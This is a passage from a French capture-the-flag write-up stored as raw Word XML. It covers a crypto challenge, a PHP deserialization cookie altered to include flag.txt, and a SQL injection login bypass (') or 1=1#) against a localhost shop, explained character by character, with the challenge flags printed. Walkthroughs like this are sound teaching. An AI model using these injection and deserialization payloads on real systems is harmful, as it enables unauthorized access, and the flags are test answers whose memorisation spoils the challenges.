              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>decrypt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>msg</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:t>iv_broken</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:t>key</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rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>Display</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>the</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>IV</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print</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>xor(</w:t>
            </w:r>
            <w:r>
              <w:t>decrypted</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>plain</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rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>flag_challenge</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun"/>
          <w:b/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">On obtient le flag : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ESE{D4mn_D4ni3l}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc1837497389"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t>Challenges et résolutions des épreuves - Web App</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc1920998107"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t>WEB 50 - Much Serie Very Analyse</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Challenge très simple, en regardant la source disponible nous voyons qu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">’un cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">lang </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">est désérialisé. Cette désarialisation entraîne l’exécution de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>include($this-&gt;lang);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>En sélectionnant français comme langue pour le site, nous obtenons ce cookie:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>O%3A4%3A%22Lang%22%3A1%3A%7Bs%3A10%3A%22%00Lang%00lang%22%3Bs%3A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>%3A%22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>fr.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>%22%3B%7D</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Avec fr.php qui est le fichier à inclure et 6 la longueur du nom du fichier à inclure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Nous voulons inclure flag.txt, il suffit de modifier les paramètres décris plus haut:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>O%3A4%3A%22Lang%22%3A1%3A%7Bs%3A10%3A%22%00Lang%00lang%22%3Bs%3A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>%3A%22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>flag.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>%22%3B%7D</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nous obtenons </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ese{D4mn_PhP_Object}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="2520" w:right="1512" w:bottom="1800" w:left="1512" w:header="1080" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="decimal"/>
          <w:cols w:space="720" w:num="1"/>
          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc975256513"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t>WEB 50 - FlagShop</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>De nombreux participants pensaient acheter des flags pour monter plus vite dans le classement, mais ils ont vite été ralenti par l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>’authentification requise dans ce challenge. Le code SQL ci-dessous contient la requête effectuée pour les authentifier.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$req</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>$DB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>-&gt;</w:t>
            </w:r>
            <w:r>
              <w:t>prepare</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</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users</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>WHERE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>(username=:username</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>AND</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>password='"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>str_replace</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>';'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'[REMOVED]'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>$_POST</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'password'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>]).</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rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>$req</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>-&gt;</w:t>
            </w:r>
            <w:r>
              <w:t>execute</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>array</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"username"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>$_POST</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'username'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>));</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">On peut donc injecter dans le champ “password”, on tente une SQLi avec le payload : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>') or 1=1#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Détaillons un peu le payload caractère par caractère.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> : permet de fermer le selecteur password=’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> : permet de fermer la requête select * from users where (username ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> : permet d’exprimer une autre condition car “false” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> “true” renvoie “true”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> : permet d’obtenir une requête toujours vraie  select * where (username=xxx) or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1=1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>: débute un commentaire, le reste de la requête est ignorée select * where (username=xxx) or 1=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>bla</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">Grâce à ce payload on accède au reste du site en étant connecté en tant que </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>user1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> , malheureusement son compte en banque est insuffisant pour acheter mais on peut envoyer de l’argent à un ami. Essayons de nous connecter avec différents utilisateurs (ou on peut utiliser SQLMap et regarder le compte de chacun d’entre eux). Le payload pour se connecter en tant que </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">user2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>est le suivant :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ') or 1=1 limit 1,2#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">. On accède à un formulaire nous permettant de transférer de l’argent. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3249295" cy="1987550"/>
            <wp:effectExtent l="0" t="0" r="8255"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4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3249295" cy="1987550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">Afin d’éviter que les participants du CTF ne vide tous les comptes des users, ceux-ci ne possèdent pas assez pour acheter un flag. Il devient assez évident qu’il faut trouver un autre moyen, il n’est malheureusement pas possible de faire une STACKED QUERY pour ajouter un autre utilisateur dans la base de données à l’aide d’un INSERT INTO. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">En jouant un peu avec le site on obtient la requête suivante lorsque l’on envoie de l’argent à un ami. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://localhost/ESE%20WEB%20X%20-%20FlagShop/index.php?do=phpinfo&amp;to=user2" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="102"/>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>http://localhost/ESE%20WEB%20X%20-%20FlagShop/index.php?do=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="102"/>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>displayMoney</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="102"/>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>&amp;to=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="102"/>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>user2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">Deux paramètres nous interpellent, displayMoney pourrait être une fonction ou une page et user2 correspond au nom d’utilisateur recevant l’argent. On tente d’afficher un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>phpinfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
